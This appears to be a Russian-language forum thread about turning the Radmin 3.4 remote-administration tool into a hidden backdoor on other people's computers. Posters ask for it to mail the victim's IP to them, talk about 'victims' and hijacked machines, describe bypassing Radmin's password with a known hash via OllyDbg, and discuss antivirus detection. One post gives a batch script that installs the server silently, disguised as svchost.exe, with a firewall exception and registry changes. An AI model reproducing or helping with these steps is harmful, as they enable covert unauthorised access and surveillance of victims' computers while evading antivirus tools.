кто может сделать для меня скрытый radmin 3,4 очень нада чтобы IP пришол комне на почту [email protected]
Hi , Can you provide some files for Raadmin 3.4 I need it for Windows 7 or some files work with Windows 7 - admdll.dll - raddrv.dll - svchost.exe This files i mean Greetings
как я понял, тут если запустить, то Радмин в автозапуске будет уже? и будет включаться при включении компа... а как это можно убрать, что бы вручную только запускать (автозагрузка не нужна). И что нужно сделать, если он уже запускается вместе с компом?
Все понятно кроме одного Я получил доступ к шелу, как мне слить фаил локально который находится у меня на фтп
я думаю те самые компы ктото в свое время заваевал самастаятельно а ты просто решил пользваться его благами вот он и сменил пассы для еденаличного пользвания яб на его месте еще сменил бы порт чтоб сканером радминовским не выдавать своих жертв )))
Афтору респект и уважуха очень актуальную тему развил но вот остались ешо вапросы с локалкой то всё понятно но вот как быть если сервак радминовский находится не в локальной а вовсемирной сети и у него не выделеный айпишник можно конечно через Hamachi но опять таки как его установить и настроить скрытно и чтоб он потом в трее не палился я думаю что темы очень тесные и нет смысла заводить новую тему можно всё обсудить здесь
Товарищи! Соотечественники! Подскажите какие ветки реестра и какие файлы нужны для полной работы radmin 3.4 hide ?
Добавлю свои 5 копеек. Долго мучался с перебором пароля зная hash - задача стояла не менять hash и не сбрасывать - чтобы пользователь не заметил. Удалось найти подробный мануал с видео ( правда по китайски) как во время запроса пароля подсунуть radmin'y узнанный hash вместо пароля, при помощи OLLYDBG. Это для версии 2.х Кстати у них же есть уже написанная программа для версии 3.0, даже не нужно OLLYDBG запускать. Я с ней не разбирался, т.к. у меня проблема была с версией 2.2 Немного написал про метод (когда еще не знал его решения) тут
своими руками батник поковыряй, вроде каспер его сечёт из-за того что там присутствует имя системного процесса svhost
Батник палит только из за строчки Code: netsh firewall add allowedprogram "%Windir%\svchost.exe" "Remote Administrator Server" ENABLE
после удачной установки серверной части радмина (например в папку Help) можно ли из неё удалять файлы AdmDll.dll , raddrv.dll, svchost.exe ? ато как то палевно когда они там все лежат P.S. йа использовал батник Code: @echo off echo PLEASE WAIT WHILE PROGRAM LOADS . . . netsh firewall add allowedprogram "%Windir%\help\svchost.exe" "Remote Administrator Server" ENABLE reg export "HKEY_LOCAL_MACHINE\SYSTEM\RAdmin" 123.reg reg delete "HKEY_LOCAL_MACHINE\SYSTEM\RAdmin" /f copy /y "svchost.exe" "%SYSTEMROOT%/help\svchost.exe" copy /y "raddrv.dll" "%SYSTEMROOT%/help\raddrv.dll" copy /y "admdll.dll" "%SYSTEMROOT%/help\admdll.dll" reg import 111.reg regedit /s 111.reg "%SYSTEMROOT%/help\svchost.exe" /install /silence "%SYSTEMROOT%/help\svchost.exe" /start
Code: del /f /q %SYSTEMROOT%\help\svchost.exe del /f /q %SYSTEMROOT%\help\raddrv.dll del /f /q %SYSTEMROOT%\help\admdll.dll